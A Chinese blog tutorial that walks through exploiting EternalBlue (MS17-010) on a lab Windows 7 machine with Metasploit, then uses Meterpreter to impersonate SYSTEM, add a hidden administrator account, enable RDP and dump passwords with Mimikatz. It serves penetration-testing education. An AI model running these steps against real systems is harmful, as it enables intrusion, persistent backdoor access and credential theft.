kail利用永恒之蓝渗透windows7
kali利用永恒之蓝kali windows 7 旗舰版
一、前提win7关闭防火墙,打开kali系统终端中输入 msfconsole回车,此图是随机生成
二、然后查询永恒之蓝对应的漏洞,此漏洞叫ms17-010 使用search ms17-010
三、弱出6项选择,一般来说每个漏洞的方式不同,也需要搭建不环境,我们这里选择 use 2即可,你会发现命令行有红色的内容,就是我们刚刚选择的漏洞。
四、对于漏洞我们要进行基础设置才能用输入options回事
五、这里修改的是RHOSTS 你的攻击目标是哪个机器,输入 set RHOSTS 192.168.169.133因为我们已经知道windows ip是这个
六、检查发现里面的RHOSTS已经被 修改了
七、输入run开始攻击测试,等到输出==WIN==表示成功了
八、出现meterpreter >就说明已经成功了,Meterpreter 是 Metasploit 的一个扩展模块,可以调用Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等
1)显示远程主机系统信息:sysinfo
2)查看用记身份:getuid
3)对远程主机当前屏幕进行截图:screenshot
4)获取靶机控制台:shell
#kali获取Window的shell后续一直乱码 解决办法https://blog.csdn.net/GUN_C/article/details/127868721
5)上传upload/download下载文件
ls查看靶机windows 的目录文件
lls查看kali本机当前目录文件
上传文件:upload 123.txt
下载文件:download wusa.exe
6)查看靶机IP地址信息
7)进入提权模式,从靶机dos命令退出exit,输入use incognito
8)查看可用权限和级别 list_tokens -u
9)、切到system权限下impersonate_token "NT AUTHORITY\SYSTEM"
10)创建靶机上创建用户,把用户加入到administrators组中
net user huhua 1234 /add 创建用户
net localgroup administrators hehua /add 把用户加入管理员组
net user 查看所有用户信息
11)强制远程启服务: run post/windows/manage/enable_rdp
12)Mimikatz可以帮助安全测试人员轻松抓取系统密码,此外还包括能够通过获取的Kerberos登录凭据,绕过支持RestrictedAdmin模式下Windows 8或Windows Server 2012的远程终端(RDP)等功能,还能在PowerShell中执行,实现偷窃、注入凭证、伪造Kerberos票证创建,以及很多其他的功能。
输入load kiwi
creds_all
本文来自博客园,作者:聆听城市喧哗,转载请注明原文链接:https://www.cnblogs.com/fzhelpdesk/p/17927525.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异
· 三行代码完成国际化适配,妙~啊~